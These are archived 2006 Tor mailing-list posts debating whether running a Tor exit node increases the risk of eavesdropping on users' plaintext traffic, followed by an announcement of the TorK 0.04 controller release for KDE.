On Monday 21 August 2006 19:05, Chris Palmer wrote: Robert Hogan writes: It's not a matter of speculation. Using Tor expands the number of potential eavesdroppers by at least the number of exit nodes in the Tor network. I understood the question to be something like, Are Tor operators more likely to be eavesdroppers than regular IP-layer router operators, layer 2 snoopers, spyware authors, and other meanies? Maybe I misunderstood. My point was that it's easier to run a tor exit node than do any of the above. That makes it more likely to happen. There are so many opportunities for eavesdropping, and they are so often taken (on small and global scales), that worrying about Tor operators is relatively minor -- especially since if you really want security, you're already using end-to-end encryption anyway. It's moot. I don't think the law is much consolation for someone who wants to remain anonymous! Again, I'm not saying -- I never even sort of said -- that people who want anonymity should pin their hopes on Tor operators knowing and observing US law. Sorry, I was being a smartarse. -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
Re: following on from today's discussion
On Friday 18 August 2006 22:47, Roger Dingledine wrote: [Dropping the or-dev CC since this isn't related to Tor development] On Fri, Aug 18, 2006 at 10:14:29PM +0100, Robert Hogan wrote: That aside, I think it has highlighted a security risk that Tor itself may be guilty of understating to new users, namely that using Tor exposes your traffic to a much higher likelihood of being eavesdropped than normal. For example, I am not a network admin by day so I do not have access to public internet traffic through legal means. Yet I am running a Tor exit server, so I can now legally (though unethically) listen to your internet traffic and harvest any passwords that go by. Actually, look at http://tor.eff.org/eff/tor-legal-faq.html.en#ExitSnooping It is an open legal question -- that is, there's no clear precedent with respect to Tor servers -- but it's probably not wise to just assume that it's legal. Also, remember that there are many jurisdictions out there, and they all have their own complex laws. I do not think the gravity of this trade-off by the tor user (security for anonymity) is adequately represented. I agree. Somebody should write a clear introduction to Tor, what it does, and what it doesn't do. One day that somebody will be me, but I would welcome some early versions to help me along. Now that I see it for what it is, I am definitely going to introduce some sort of nag/warning to TorK so that the user is warned at least once that using plaintext protocols carrying authentication information on Tor carries a serious health warning. Am I overstating the case? Do others think that the nature of the compromise tor users make is transparent to them? The reason I haven't emphasized the issue so far is that I think you're overstating the protection ordinary users get from the Internet as it is. For example, if you're on a local network with other users (often including everybody in your neighborhood for cablemodem systems), you're not in very good shape. Tor solves this issue, and for many users it's a huge issue. Then there's the question of the Internet infrastructure itself -- your Internet packets travel over a wide variety of places on the way to their destination. Sometimes packets get mis-routed to, well, pretty much anywhere. The chance that any hop along the way is able to observe them -- for example because of a crooked employee, but also because some Russian cracker 0wns a computer nearby in the path -- is hard to estimate in general, but from studying botnets and dealing with net security for the past decade or so, I don't feel it's as low as you imply. All that said, I agree with you that most of the danger is probably at the endpoints of the communication -- on the path from you to your entry Tor node, and on the path from your exit node to your destination. Tor solves the first issue and changes the second issue -- possibly for the worse, depending on your situation. So barring any actual data about the security of the Internet as a whole, which seems hard to get, I still stick with my answer from http://wiki.noreply.org/noreply/TheOnionRouter/TorFAQ#ExitEavesdroppers If you're not using end-to-end encryption, then you're in bad shape, whether you use Tor (and are exposed to one set of risks) or don't use Tor (and are exposed to a different set of risks). --Roger Thank you for that very considered response. Tor definitely does change the qualtitative and quantative risk of being eavesdropped though - and i think it is this fact that is understated. The anonymity provided by tor comes at a price: the increased risk of any-old-joe (and not just the corener cases of a crooked isp employee, or a hacker listening to misrouted packets) harvesting your traffic. The exact degree of this increased risk obviously depends on your view of the risk posed by normal use of the internet, as you have pointed out. My feeling is that anything that extends the circle of risk from exposure to hackers/crooked ISP employees/ISPs themselves to exposure to the likes of me (a curious amateur with no special priveleges) represents a sea-change in the user's security 'posture'. I'm not saying that the shift is catastrophic but it is definitely a compromise that needs more emphasis. -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
TorK 0.04 Released.
Hi there, Just a quick note to let you know that TorK 0.04 has been released. As you may or may not guess from the name TorK is a Tor Controller for KDE. It provides a wide range of 'quick' configuration settings as well as the ability to granularly define the way you want Tor to run. You can create and manage circuits using a drag and drop interface. You can even update your Tor settings on the fly. The latest version also introduces a nifty little connection monitor which sits in whichever corner you choose and displays the state of your current Tor usage. And if you find it annoying rather than nifty you can simply turn it off. TorK is available at http://tork.sf.net. The users list is: [EMAIL PROTECTED] If you try it out let me know how you get on and what you feel needs improvement - it's still very early days! Thanks, Robert -- KlamAV - An Anti-Virus Manager for KDE - http://www.klamav.net TorK - A Tor Controller For KDE - http://tork.sf.net
